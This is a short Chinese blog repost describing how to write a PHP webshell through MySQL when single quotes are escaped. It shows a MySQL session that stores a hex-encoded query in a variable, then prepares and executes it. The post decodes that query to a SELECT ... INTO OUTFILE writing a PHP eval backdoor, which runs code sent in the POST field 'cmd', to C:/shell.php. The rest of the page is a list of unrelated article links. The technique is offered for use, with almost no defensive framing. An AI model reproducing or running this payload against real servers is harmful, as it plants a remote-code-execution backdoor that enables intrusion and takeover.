博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
单引号转义时load_file/outfile 生成一句话
阅读量:7049 次
发布时间:2019-06-28

本文共 688 字,大约阅读时间需要 2 分钟。

 mysql多语句执行下不用单引号outfile写shell


mysql> use xssdb;
Database changed

mysql> set @a=0x73656C6563742030783343334637303638373032303430363537363631364332
38323435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
Query OK, 0 rows affected (0.00 sec)
mysql> prepare cmd from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared
mysql> execute cmd;
Query OK, 1 row affected (0.00 sec)


上面加密的十六进制是:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'

本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/571126,如需转载请自行联系原作者

你可能感兴趣的文章
阿里互联网研发团队的持续交付实践
查看>>
《重构HTML:改善Web应用的设计(修订版)》——第1章 重构1.1 为何重构
查看>>
科学音频处理(一):怎样使用 Octave 对音频文件进行读写操作
查看>>
Iptables DDOS/CC 自动屏蔽脚本
查看>>
Insect Workflow
查看>>
《Ext JS实战》——1.7 小结
查看>>
Hadoop上小文件存储处理
查看>>
优秀的开源系统恢复软件
查看>>
《网页设计与前端开发 Dreamweaver+Flash+Photoshop+HTML+CSS+JavaScript 从入门到精通》——2.3 HTML头部标记head...
查看>>
《Adobe Flash CS6中文版经典教程》——1.11 保存影片
查看>>
Java核心技术卷I基础知识3.6.3 不可变字符串
查看>>
《大数据导论》一2.3 业务流程管理
查看>>
Android--短信拦截及IP拨号
查看>>
线程的优先级
查看>>
AM335x(TQ335x)学习笔记——WM8960声卡驱动移植
查看>>
从EXCHANGE 2010的DAG中删除其中一个MEMBER
查看>>
Ehcache学习笔记
查看>>
Tomcat 内存溢出对应解决方式
查看>>
Mac下 Thinkphp3.2 语言包问题
查看>>
你意想不到的的编程问题
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-02-07 07:20:06   当前IP: 13.58.3.190   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我